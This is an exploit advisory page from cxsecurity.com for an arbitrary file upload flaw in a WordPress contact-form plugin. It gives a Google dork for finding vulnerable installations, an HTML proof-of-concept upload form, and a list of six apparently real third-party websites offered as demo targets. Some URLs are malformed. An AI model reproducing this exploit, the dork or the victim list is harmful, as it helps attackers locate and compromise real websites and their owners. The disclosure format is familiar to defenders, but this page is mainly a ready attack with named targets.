WordPress Plugins console contact form - Arbitrary File Upload

Published
Credit
Risk
2017.06.08
sohaip-hackerDZ
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:wp-content/plugins/console_contact_form/

# Exploit Title: WordPress Plugins console contact form - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/console_contact_form/
# Date:2017-06-06
# Exploit Author: sohaip-hackerDZ
# Tested on:linux mint

# 1. search dork for google
# 2. Exploit the websites
# https://localhost//wp-content/plugins/console_contact_form/upload_file.php?files
# [+] if MSG :
# {"files":[]}

# 4. PoC :
===================================================================================================

<form method="POST" action="hhtp://127.0.0.1/wp-content/plugins/console_contact_form/upload_file.php?files" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>

====================================================================================================
[+] dimo :
================================================================
https://www.fxwebstudio.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
https://www.tuza.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
http://www.physioandbeyond.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
http://www.theplumbingeffect.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
hhtp://www.cld9.ph/wp-content/plugins/console_contact_form/upload_file.php?files
http://https://www.hellolocalmedia.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
=========================================================================================
Great : sohaip-hackerDZ :: spyhackerz.com #
fp : https://www.facebook.com/sohaipbarika #
forum : http://www.spyhackerz.com/forum/ #
############################################


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com